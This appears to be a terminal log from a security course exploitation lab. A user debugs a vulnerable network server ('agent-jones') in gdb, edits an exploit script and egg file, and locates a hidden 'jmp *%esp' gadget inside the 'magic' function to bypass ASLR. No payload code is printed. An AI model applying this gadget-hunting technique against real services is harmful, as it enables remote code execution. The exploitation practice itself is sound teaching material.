individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

                                                        _/        _/
     _/_/_/    _/      _/      _/  _/_/_/      _/_/_/  _/_/_/    _/    _/_/
    _/    _/  _/      _/      _/  _/    _/  _/    _/  _/    _/  _/  _/_/_/_/
   _/    _/    _/  _/  _/  _/    _/    _/  _/    _/  _/    _/  _/  _/
  _/_/_/        _/      _/      _/    _/    _/_/_/  _/_/_/    _/    _/_/_/
 _/
_/

Last login: Thu Jan 28 12:07:22 2016 from 10.0.2.2
    _    ____  _     ____  _          _
   / \  / ___|| |   |  _ \( ) ___  __| |
  / _ \ \___ \| |   | |_) |/ / _ \/ _` |
 / ___ \ ___) | |___|  _ <  |  __/ (_| |
/_/   \_\____/|_____|_| \_\  \___|\__,_|

         The VM now uses ASLR

jones@pwnable:~$ ls
agent-jones  agent-jones.c  exploit  PWNED
jones@pwnable:~$ vi agent-jones.c
jones@pwnable:~$ vi agent-jones.c
jones@pwnable:~$ invoke -d agent-jones 4444
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/jones/agent-jones...done.
(gdb) b main
Breakpoint 1 at 0x8048744: file agent-jones.c, line 45.
(gdb) layout split
jones@pwnable:~$ ls
agent-jones  agent-jones.c  exploit  PWNED
jones@pwnable:~$ vi exploit
jones@pwnable:~$ ./exploit
sending exploit...
./exploit: 3: ./exploit: ./egg: not found
connecting to 0wned machine...
jones@pwnable:~$ vi exploit
jones@pwnable:~$ vi egg
jones@pwnable:~$ invoke -d agent-jones 4444
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/jones/agent-jones...done.
(gdb) q
jones@pwnable:~$ ./exploit
sending exploit...
./exploit: 3: ./exploit: ./egg: Permission denied
connecting to 0wned machine...
jones@pwnable:~$ vi agent-jones.c
jones@pwnable:~$ ls
agent-jones  agent-jones.c  egg  exploit  PWNED
jones@pwnable:~$ vi e
jones@pwnable:~$ ls
agent-jones  agent-jones.c  egg  exploit  PWNED
jones@pwnable:~$ vi egg
jones@pwnable:~$ vi exploit
jones@pwnable:~$ vi agent-jones.c
jones@pwnable:~$ invoke -d agent-jones 4444
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/jones/agent-jones...done.
(gdb) disass main
Dump of assembler code for function main:
   0x0804873b <+0>:	push   %ebp
   0x0804873c <+1>:	mov    %esp,%ebp
   0x0804873e <+3>:	and    $0xfffffff0,%esp
   0x08048741 <+6>:	sub    $0x50,%esp
   0x08048744 <+9>:	cmpl   $0x2,0x8(%ebp)
   0x08048748 <+13>:	je     0x8048770 <main+53>
   0x0804874a <+15>:	mov    0xc(%ebp),%eax
   0x0804874d <+18>:	mov    (%eax),%ecx
   0x0804874f <+20>:	mov    $0x80489bb,%edx
   0x08048754 <+25>:	mov    0x804a03c,%eax
   0x08048759 <+30>:	mov    %ecx,0x8(%esp)
   0x0804875d <+34>:	mov    %edx,0x4(%esp)
   0x08048761 <+38>:	mov    %eax,(%esp)
   0x08048764 <+41>:	call   0x80484e0 <fprintf@plt>
   0x08048769 <+46>:	mov    $0x1,%eax
   0x0804876e <+51>:	leave
   0x0804876f <+52>:	ret
   0x08048770 <+53>:	movl   $0x0,0x8(%esp)
   0x08048778 <+61>:	movl   $0x1,0x4(%esp)
   0x08048780 <+69>:	movl   $0x2,(%esp)
   0x08048787 <+76>:	call   0x8048520 <socket@plt>
   0x0804878c <+81>:	mov    %eax,0x4c(%esp)
   0x08048790 <+85>:	cmpl   $0x0,0x4c(%esp)
   0x08048795 <+90>:	jns    0x80487a3 <main+104>
   0x08048797 <+92>:	movl   $0x80489cb,(%esp)
   0x0804879e <+99>:	call   0x804864d <error>
   0x080487a3 <+104>:	movl   $0x1,0x44(%esp)
   0x080487ab <+112>:	movl   $0x4,0x10(%esp)
   0x080487b3 <+120>:	lea    0x44(%esp),%eax
   0x080487b7 <+124>:	mov    %eax,0xc(%esp)
   0x080487bb <+128>:	movl   $0x2,0x8(%esp)
   0x080487c3 <+136>:	movl   $0x1,0x4(%esp)
   0x080487cb <+144>:	mov    0x4c(%esp),%eax
   0x080487cf <+148>:	mov    %eax,(%esp)
---Type <return> to continue, or q <return> to quit---
   0x080487d2 <+151>:	call   0x8048480 <setsockopt@plt>
   0x080487d7 <+156>:	test   %eax,%eax
   0x080487d9 <+158>:	jns    0x80487e7 <main+172>
   0x080487db <+160>:	movl   $0x80489d4,(%esp)
   0x080487e2 <+167>:	call   0x804864d <error>
   0x080487e7 <+172>:	lea    0x34(%esp),%eax
   0x080487eb <+176>:	movl   $0x0,(%eax)
   0x080487f1 <+182>:	movl   $0x0,0x4(%eax)
   0x080487f8 <+189>:	movl   $0x0,0x8(%eax)
   0x080487ff <+196>:	movl   $0x0,0xc(%eax)
   0x08048806 <+203>:	movw   $0x2,0x34(%esp)
   0x0804880d <+210>:	movl   $0x0,0x38(%esp)
   0x08048815 <+218>:	mov    0xc(%ebp),%eax
   0x08048818 <+221>:	add    $0x4,%eax
   0x0804881b <+224>:	mov    (%eax),%eax
   0x0804881d <+226>:	mov    %eax,(%esp)
   0x08048820 <+229>:	call   0x8048510 <atoi@plt>
   0x08048825 <+234>:	movzwl %ax,%eax
   0x08048828 <+237>:	mov    %eax,(%esp)
   0x0804882b <+240>:	call   0x8048490 <htons@plt>
   0x08048830 <+245>:	mov    %ax,0x36(%esp)
   0x08048835 <+250>:	movl   $0x10,0x8(%esp)
   0x0804883d <+258>:	lea    0x34(%esp),%eax
   0x08048841 <+262>:	mov    %eax,0x4(%esp)
   0x08048845 <+266>:	mov    0x4c(%esp),%eax
   0x08048849 <+270>:	mov    %eax,(%esp)
   0x0804884c <+273>:	call   0x80484f0 <bind@plt>
   0x08048851 <+278>:	test   %eax,%eax
   0x08048853 <+280>:	jns    0x8048861 <main+294>
   0x08048855 <+282>:	movl   $0x80489f0,(%esp)
   0x0804885c <+289>:	call   0x804864d <error>
   0x08048861 <+294>:	movl   $0x5,0x4(%esp)
   0x08048869 <+302>:	mov    0x4c(%esp),%eax
   0x0804886d <+306>:	mov    %eax,(%esp)
   0x08048870 <+309>:	call   0x8048500 <listen@plt>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) disass magic
Dump of assembler code for function magic:
   0x08048604 <+0>:	push   %ebp
   0x08048605 <+1>:	mov    %esp,%ebp
   0x08048607 <+3>:	mov    0xc(%ebp),%eax
   0x0804860a <+6>:	shl    $0x3,%eax
   0x0804860d <+9>:	xor    %eax,0x8(%ebp)
   0x08048610 <+12>:	mov    0x8(%ebp),%eax
   0x08048613 <+15>:	shl    $0x3,%eax
   0x08048616 <+18>:	xor    %eax,0xc(%ebp)
   0x08048619 <+21>:	orl    $0xe4ff,0x8(%ebp)
   0x08048620 <+28>:	mov    0xc(%ebp),%ecx
   0x08048623 <+31>:	mov    $0x3e0f83e1,%edx
   0x08048628 <+36>:	mov    %ecx,%eax
   0x0804862a <+38>:	mul    %edx
   0x0804862c <+40>:	mov    %edx,%eax
   0x0804862e <+42>:	shr    $0x4,%eax
   0x08048631 <+45>:	add    %eax,%eax
   0x08048633 <+47>:	mov    %eax,%edx
   0x08048635 <+49>:	shl    $0x5,%edx
   0x08048638 <+52>:	add    %edx,%eax
   0x0804863a <+54>:	mov    %ecx,%edx
   0x0804863c <+56>:	sub    %eax,%edx
   0x0804863e <+58>:	mov    %edx,%eax
   0x08048640 <+60>:	mov    %eax,0xc(%ebp)
   0x08048643 <+63>:	mov    0xc(%ebp),%eax
   0x08048646 <+66>:	mov    0x8(%ebp),%edx
   0x08048649 <+69>:	and    %edx,%eax
   0x0804864b <+71>:	pop    %ebp
   0x0804864c <+72>:	ret
End of assembler dump.
(gdb) x/i 0x08048619
   0x8048619 <magic+21>:	orl    $0xe4ff,0x8(%ebp)
(gdb) x/i 0x0804861c
   0x804861c <magic+24>:	jmp    *%esp
(gdb) q
jones@pwnable:~$ vi agent-jones.c

    return 1;
  }

  int srv = socket(AF_INET, SOCK_STREAM, 0);
  if (srv < 0)
    error("socket()");

  int on = 1;
  if (setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0)
    error("setting SO_REUSEADDR failed");

  struct sockaddr_in server, client;
  memset(&server, 0, sizeof(server));
  server.sin_family = AF_INET;
  server.sin_addr.s_addr = INADDR_ANY;
  server.sin_port = htons(atoi(argv[1]));

  if (bind(srv, (struct sockaddr *) &server, sizeof(server)) < 0)
    error("bind()");

  if (listen(srv, 5) < 0)
    error("listen()");

  socklen_t c = sizeof(client);
  int client_socket;
  for (;;)
  {
    if ((client_socket = accept(srv, (struct sockaddr *) &client, &c)) < 0)
      error("accept()");
    handle(client_socket);
    close(client_socket);
  }

  return 0;
}